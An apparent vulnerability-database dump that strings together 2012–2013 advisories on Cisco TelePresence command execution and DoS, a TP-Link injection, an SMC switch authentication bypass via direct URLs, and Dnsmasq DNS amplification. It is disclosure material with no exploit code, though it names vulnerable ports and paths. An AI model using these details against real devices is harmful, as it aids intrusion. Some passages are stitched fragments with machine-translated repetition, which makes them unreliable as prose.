iEYEARECAAYFAk/9nQcACgkQtjd2rKp+ALwy+QCfRYR3eaF29k28f7gYjgC0vcVk
NLIAn0GWWLPQ0VPfcFUjC6RlyahlwImL
=wjkz
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
EMC Products Security Bypass Security Issue
SECUNIA ADVISORY ID:
SA49911
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49911/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49911
RELEASE DATE:
2012-07-12
DISCUSS ADVISORY:
http://secunia.com/advisories/49911/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49911/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49911
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A security issue has been reported in multiple EMC products, which
can be exploited by malicious users to potentially bypass certain
security restrictions.
SOLUTION:
Update to a fixed version. Updated software can be downloaded from
Powerlink.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
EMC (ESA-2012-027):
http://archives.neohapsis.com/archives/bugtraq/2012-07/att-0063/ESA-2012-027.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0591 | No CVE | TP Link Gateway Multiple HTML Code Injection Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
TP Link is a provider specializing in the development, manufacture and sale of network and communication equipment. There are multiple HTML code injection vulnerabilities in the implementation of the TP Link Gateway. Use these vulnerabilities to execute HTML and script code on your device to steal authentication credentials or control the look of your site
| VAR-201207-0064 | CVE-2012-2486 | Cisco TelePresence Vulnerabilities in products that allow arbitrary code execution |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
The Cisco Discovery Protocol (CDP) implementation on Cisco TelePresence Multipoint Switch before 1.9.0, Cisco TelePresence Immersive Endpoint Devices before 1.9.1, Cisco TelePresence Manager before 1.9.0, and Cisco TelePresence Recording Server before 1.8.1 allows remote attackers to execute arbitrary code by leveraging certain adjacency and sending a malformed CDP packet, aka Bug IDs CSCtz40953, CSCtz40947, CSCtz40965, and CSCtz40953. The problem is Bug ID CSCtz40953 , CSCtz40947 , CSCtz40965 and CSCtz40953 It is a problem.A third party may use an adjacent network CDP By sending a packet, arbitrary code may be executed. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. The problem is that because the malformed Cisco Discovery Protocol message is incorrectly processed, the attacker can submit a malformed message to the affected device and execute any system command. Also known as Bug IDs CSCtz40953, CSCtz40947, CSCtz40965 and CSCtz40953. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Cisco TelePresence Immersive Endpoint Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA49879
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49879/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
RELEASE DATE:
2012-07-12
DISCUSS ADVISORY:
http://secunia.com/advisories/49879/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49879/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco TelePresence
Immersive Endpoint devices, which can be exploited by malicious users
and malicious people to compromise a vulnerable system.
1) An error within a Cisco TelePresence API can be exploited to
inject and execute arbitrary commands via a specially crafted request
to TCP port 61480.
For more information see vulnerability#2 in:
SA49864
The vulnerabilities #1 and #2 are reported in in Cisco TelePresence
Immersive Endpoint devices versions 1.6 and prior, 1.7, and 1.8.
3) An error within the administrative web interface can be exploited
to inject and execute arbitrary commands by sending a specially
crafted request to TCP port 443.
This vulnerability is reported in Cisco TelePresence Immersive
Endpoint devices versions 1.6 and prior and 1.7.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120711-cts
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Successful exploitation requires the ability to send an Ethernet
frame directly to the device
| VAR-201207-0177 | CVE-2012-3076 |
Cisco TelePresence Recording Server WEB Interface Remote Command Injection Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201207-0299 |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Recording Server before 1.8.0 allows remote authenticated users to execute arbitrary commands via unspecified vectors, aka Bug ID CSCth85804. The problem is Bug ID CSCth85804 It is a problem.An arbitrary command may be executed by a remotely authenticated user. Cisco TelePresence is a telepresence conferencing solution developed by Cisco.
Successful exploits will result in the execution of arbitrary attacker-supplied commands in the context of the root user. This may facilitate a complete compromise.
This issue is being tracked by Cisco bug ID CSCti21830. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. A remote attacker could exploit this vulnerability to execute arbitrary commands through an unknown vector. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Cisco TelePresence Recording Server Two Vulnerabilities
SECUNIA ADVISORY ID:
SA49864
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49864/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49864
RELEASE DATE:
2012-07-12
DISCUSS ADVISORY:
http://secunia.com/advisories/49864/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49864/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49864
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in Cisco TelePresence
Recording Server, which can be exploited by malicious users and
malicious people to compromise a vulnerable system.
2) An error within the handling of Cisco Discovery Protocol (CDP)
packets in the CDP component can be exploited to execute arbitrary
code by sending a specially crafted CDP packet.
Successful exploitation requires the ability to send an Ethernet
frame directly to the device.
The vulnerability is reported in versions 1.6 and prior, 1.7, and
1.8.
SOLUTION:
Update to version 1.8.1.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120711-ctrs
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0614 | No CVE | Cisco Multiple product remote code execution vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
Multiple Cisco Products are prone to a remote code-execution vulnerability.
Successfully exploiting this issue allows remote attackers to execute arbitrary code with elevated privileges; other attacks are also possible.
The following products are vulnerable:
Cisco TelePresence Manager
Cisco TelePresence Recording Server
Cisco TelePresence Multipoint Switch
Cisco TelePresence Immersive Endpoint System
| VAR-201207-0169 | CVE-2012-2974 | SMC Networks SMC8024L2 Switch Web Interface Authentication Bypass Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The web interface on the SMC SMC8024L2 switch allows remote attackers to bypass authentication and obtain administrative access via a direct request to a .html file under (1) status/, (2) system/, (3) ports/, (4) trunks/, (5) vlans/, (6) qos/, (7) rstp/, (8) dot1x/, (9) security/, (10) igmps/, or (11) snmp/. SMC8024L2 There is an authentication bypass vulnerability in the web management screen. SMC Networks Inc. Network switch provided by SMC8024L2 There is an authentication bypass vulnerability in the web management screen. In the web interface URL By directly entering, you can access without requiring authentication.A remote attacker may change the settings of the product. The SMC Networks SMC8024L2 Switch is a powerful switch. The WEB interface of the SMC Networks SMC8024L2 switch incorrectly restricts user access. The SMC8024L2 is a multifunctional 10/100/1000BASE-T independently managed switch
| VAR-201207-0174 | CVE-2012-3073 |
Cisco TelePresence Service disruption in products (DoS) Vulnerabilities
Related entries in the VARIoT exploits database: VAR-E-201207-0124 |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The IP implementation on Cisco TelePresence Multipoint Switch before 1.8.1, Cisco TelePresence Manager before 1.9.0, and Cisco TelePresence Recording Server 1.8 and earlier allows remote attackers to cause a denial of service (networking outage or process crash) via (1) malformed IP packets, (2) a high rate of TCP connection requests, or (3) a high rate of TCP connection terminations, aka Bug IDs CSCti21830, CSCti21851, CSCtj19100, CSCtj19086, CSCtj19078, CSCty11219, CSCty11299, CSCty11323, and CSCty11338. The problem is Bug ID CSCti21830 , CSCti21851 , CSCtj19100 , CSCtj19086 , CSCtj19078 , CSCty11219 , CSCty11299 , CSCty11323 and CSCty11338 It is a problem.Denial of service by a third party through the following items ( Network outage or process crash ) There is a possibility of being put into a state. (1) Malformed IP packet (2) High frequency TCP Connection request (3) High frequency TCP Termination of connection. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. A security issue exists in the network stack of the Cisco TelePresence operating system, allowing unauthenticated remote attackers to conduct denial of service attacks. An attacker can send a malformed IP packet sequence or TCP segment to the affected device at a higher frequency, which can cause the service and process of the affected device to crash, resulting in a denial of service attack. Multiple Cisco products are prone to a remote denial-of-service vulnerability. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. Also known as Bug IDs CSCti21830, CSCti21851, CSCtj19100, CSCtj19086, CSCtj19078, CSCty11219, CSCty11299, CSCty11323 and CSCty11338.
For more information:
SA49880
2) An error exists within the handling of Cisco Discovery Protocol
(CDP) packets. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Cisco TelePresence Recording Server Denial of Service Vulnerability
SECUNIA ADVISORY ID:
SA49880
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49880/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49880
RELEASE DATE:
2012-07-12
DISCUSS ADVISORY:
http://secunia.com/advisories/49880/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49880/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49880
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Cisco TelePresence Recording
Server, which can be exploited by malicious people to cause a DoS
(Denial of Service).
The vulnerability is reported in versions 1.6 and prior, 1.7, and
1.8.
SOLUTION:
No official solution is currently available.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120711-ctrs
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201207-0175 | CVE-2012-3074 | Cisco TelePresence Immersive Endpoint device API Vulnerable to arbitrary command execution |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
An unspecified API on Cisco TelePresence Immersive Endpoint Devices before 1.9.1 allows remote attackers to execute arbitrary commands by leveraging certain adjacency and sending a malformed request on TCP port 61460, aka Bug ID CSCtz38382. The vulnerability is caused by the affected software not correctly handling the malformed request. Unauthenticated remote attackers can exploit the vulnerability to send malicious requests to port 61460. Successful exploitation of the vulnerability can execute arbitrary commands on the device with high privileges. The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. Also known as Bug ID CSCtz38382. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Cisco TelePresence Immersive Endpoint Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA49879
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49879/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
RELEASE DATE:
2012-07-12
DISCUSS ADVISORY:
http://secunia.com/advisories/49879/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49879/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49879
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco TelePresence
Immersive Endpoint devices, which can be exploited by malicious users
and malicious people to compromise a vulnerable system.
2) An error exists within the handling of Cisco Discovery Protocol
(CDP) packets.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120711-cts
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201303-0027 | CVE-2012-3411 | Dnsmasq Remote Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Dnsmasq before 2.63test1, when used with certain libvirt configurations, replies to requests from prohibited interfaces, which allows remote attackers to cause a denial of service (traffic amplification) via a spoofed DNS query. Dnsmasq is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause denial-of-service conditions through a stream of spoofed DNS queries producing large results.
Dnsmasq versions 2.62 and prior are vulnerable. Relevant releases/architectures:
RHEV Hypervisor for RHEL-6 - noarch
3. The Red Hat Enterprise Virtualization Hypervisor
is a dedicated Kernel-based Virtual Machine (KVM) hypervisor.
Note: Red Hat Enterprise Virtualization Hypervisor is only available for
the Intel 64 and AMD64 architectures with virtualization extensions.
A flaw was found in the way the vhost kernel module handled descriptors
that spanned multiple regions. A privileged guest user could use this flaw
to crash the host or, potentially, escalate their privileges on the host.
(CVE-2013-0311)
It was found that the default SCSI command filter does not accommodate
commands that overlap across device classes. A privileged guest user could
potentially use this flaw to write arbitrary data to a LUN that is
passed-through as read-only. Now, the VDSM version
compatibility is considered and the upgrade message only displays if there
is an upgrade relevant to the host available. As a result, virtual machines with
supported CPU models were not being properly parsed by libvirt and failed
to start. Virtual machines now start normally. This allows for multiple versions of the hypervisor
package to be installed on a system concurrently without making changes to
the yum configuration as was previously required. Bugs fixed (http://bugzilla.redhat.com/):
833033 - CVE-2012-3411 libvirt+dnsmasq: DNS configured to answer DNS queries from non-virtual networks
835162 - rhev-hypervisor 6.4 release
853092 - rhev-h: supported vdsm compatibility versions should be supplied along with rhev-h ISOs
863579 - RFE: Support installonlypkgs functionality for rhev-hypervisor packages
875360 - CVE-2012-4542 kernel: block: default SCSI command filter does not accomodate commands overlap across device classes
912905 - CVE-2013-0311 kernel: vhost: fix length for cross region descriptor
6. packets that should not be passed in) may be sent to the dnsmasq
application and processed. This can result in DNS amplification
attacks for example (CVE-2012-3411). It was found that after the upstream patch for
CVE-2012-3411 issue was applied, dnsmasq still:
- replied to remote TCP-protocol based DNS queries (UDP protocol
ones were corrected, but TCP ones not) from prohibited networks,
when the --bind-dynamic option was used,
- when --except-interface lo option was used dnsmasq didn't answer
local or remote UDP DNS queries, but still allowed TCP protocol based
DNS queries,
- when --except-interface lo option was not used local / remote TCP
DNS queries were also still answered by dnsmasq.
This update fix these three cases. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFRYvSNmqjQ0CJFipgRAmDuAKDqB4WerX13N+7g/zR6iU5C6b8QjACdEdEW
koGb8Voa5rhgjjRVCT1ZvBg=
=VQ4h
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201406-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Dnsmasq: Denial of Service
Date: June 25, 2014
Bugs: #436894, #453170
ID: 201406-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A vulnerability in Dnsmasq can lead to a Denial of Service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Dnsmasq users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-dns/dnsmasq-2.66"
References
==========
[ 1 ] CVE-2012-3411
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3411
[ 2 ] CVE-2013-0198
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0198
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201406-24.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2014 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: dnsmasq security, bug fix and enhancement update
Advisory ID: RHSA-2013:0277-02
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0277.html
Issue date: 2013-02-21
CVE Names: CVE-2012-3411
=====================================================================
1. Summary:
Updated dnsmasq packages that fix one security issue, one bug, and add
various enhancements are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate
security impact. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available from the CVE link in
the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
The dnsmasq packages contain Dnsmasq, a lightweight DNS (Domain Name
Server) forwarder and DHCP (Dynamic Host Configuration Protocol) server.
It was discovered that dnsmasq, when used in combination with certain
libvirtd configurations, could incorrectly process network packets from
network interfaces that were intended to be prohibited. (CVE-2012-3411)
In order to fully address this issue, libvirt package users are advised to
install updated libvirt packages. Refer to RHSA-2013:0276 for additional
information.
This update also fixes the following bug:
* Due to a regression, the lease change script was disabled. Consequently,
the "dhcp-script" option in the /etc/dnsmasq.conf configuration file did
not work. This update corrects the problem and the "dhcp-script" option now
works as expected. (BZ#815819)
This update also adds the following enhancements:
* Prior to this update, dnsmasq did not validate that the tftp directory
given actually existed and was a directory. Consequently, configuration
errors were not immediately reported on startup. This update improves the
code to validate the tftp root directory option. As a result, fault finding
is simplified especially when dnsmasq is called by external processes such
as libvirt. (BZ#824214)
* The dnsmasq init script used an incorrect Process Identifier (PID) in the
"stop", "restart", and "condrestart" commands. Consequently, if there were
some dnsmasq instances running besides the system one started by the init
script, then repeated calling of "service dnsmasq" with "stop" or "restart"
would kill all running dnsmasq instances, including ones not started with
the init script. The dnsmasq init script code has been corrected to obtain
the correct PID when calling the "stop", "restart", and "condrestart"
commands. As a result, if there are dnsmasq instances running in addition
to the system one started by the init script, then by calling "service
dnsmasq" with "stop" or "restart" only the system one is stopped or
restarted. (BZ#850944)
* When two or more dnsmasq processes were running with DHCP enabled on one
interface, DHCP RELEASE packets were sometimes lost. Consequently, when two
or more dnsmasq processes were running with DHCP enabled on one interface,
releasing IP addresses sometimes failed. This update sets the
SO_BINDTODEVICE socket option on DHCP sockets if running dnsmasq with DHCP
enabled on one interface. As a result, when two or more dnsmasq processes
are running with DHCP enabled on one interface, they can release IP
addresses as expected. (BZ#887156)
All users of dnsmasq are advised to upgrade to these updated packages,
which fix these issues and add these enhancements.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
833033 - CVE-2012-3411 libvirt+dnsmasq: DNS configured to answer DNS queries from non-virtual networks
850944 - "service dnsmasq restart (or dnsmasq package update) kills all instances of dnsmasq on system, including those started by libvirtd
884957 - guest can not get NAT IP from dnsmasq-2.48-10
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
i386:
dnsmasq-2.48-13.el6.i686.rpm
dnsmasq-debuginfo-2.48-13.el6.i686.rpm
x86_64:
dnsmasq-2.48-13.el6.x86_64.rpm
dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
i386:
dnsmasq-debuginfo-2.48-13.el6.i686.rpm
dnsmasq-utils-2.48-13.el6.i686.rpm
x86_64:
dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
dnsmasq-utils-2.48-13.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
x86_64:
dnsmasq-2.48-13.el6.x86_64.rpm
dnsmasq-debuginfo-2.48-13.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/dnsmasq-2.48-13.el6.src.rpm
x86_64:
